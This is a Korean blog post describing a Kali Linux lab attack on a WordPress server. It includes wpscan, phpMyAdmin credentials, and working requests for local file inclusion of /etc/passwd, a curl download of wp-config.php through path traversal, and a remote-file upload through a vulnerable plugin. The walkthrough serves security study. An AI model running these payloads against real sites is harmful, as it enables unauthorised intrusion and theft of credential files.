원문 : https://condencia.postype.com/post/2402942
원문 등록 일시 : 2018.09.04
실습환경 : Kali Linux
· wpscan : WordPress 취약점을 진단해주는 툴
1 | root@kali:/ wpscan -u [IP address]:7070/wordpress | cs |
19
192.168.86.129:7070/phpmyadmin 접속
계정명 : root, 비밀번호 : server
· LFI(Local File Inclusion) : 로컬 서버에 있는 파일을 실행에 포함시킴
https://www.exploit-db.com/exploits/40850
1 | http://[server IP address]:7070/wordpress?wpv-image=../../../etc/passwd | cs |
위의 예시를 브라우저의 url 입력란에 입력하면 로컬 서버의 /etc/passwd에 있는 계정 정보를 보여준다.
· AFD(Arbirtary File Download) : 허가되지 않은 파일을 다운로드
https://www.exploit-db.com/exploits/39593
파일 다운로드
1 2 3 4 5 6 | root@kali:/ curl http://[IP address]/wordpress/mdocs-posts/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 302 100 302 0 0 302 0 0:00:01 --:--:-- 0:00:01 294k | cs |
다운로드된 파일 확인
1 2 3 4 5 6 7 8 9 10 11 | root@kali:/ vim example-wp-config.php <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /wordpress/mdocs-posts/ was not found on this server.</p> <hr> <address>Apache/2.4.18 (Ubuntu) Server at 192.168.86.129 Port 7070</address> </body></html> | cs |
· AFU(Arbitary File Download) : 취약한 플러그인이 파일을 업로드할 수 있도록 한다.
https://www.exploit-db.com/exploits/39891
1 2 | http://[IP address]:7070/wordpress/wp-content/plugins/wp-mobile-detector/resize.php?src= http://file.gamedonga.co.kr/files/images/news_images_b/bono080523.jpg # src : 업로드하고자 하는 파일 주소 | cs |
그림과 같이 원하는 파일(bono080523.jpg)이 업로드된 것을 확인할 수 있다.
'System > Cybersecurity' 카테고리의 다른 글
레지스터의 종류 - 범용 레지스터, 세그먼트 레지스터, 플래그 레지스터 (0) | 2019.03.09 |
---|---|
정보보안 단어 요약정리 (0) | 2018.12.01 |
Ubuntu 16.04 Privilege Escalation 취약점 공격 실습 - root 권한 얻기 (0) | 2018.12.01 |
Xerosploit 활용 - MITM 공격, 파일 바꿔치기 공격 (0) | 2018.12.01 |
Metasploit을 이용한 Kali Linux에서 원격으로 서버 콘솔에 접속 (0) | 2018.12.01 |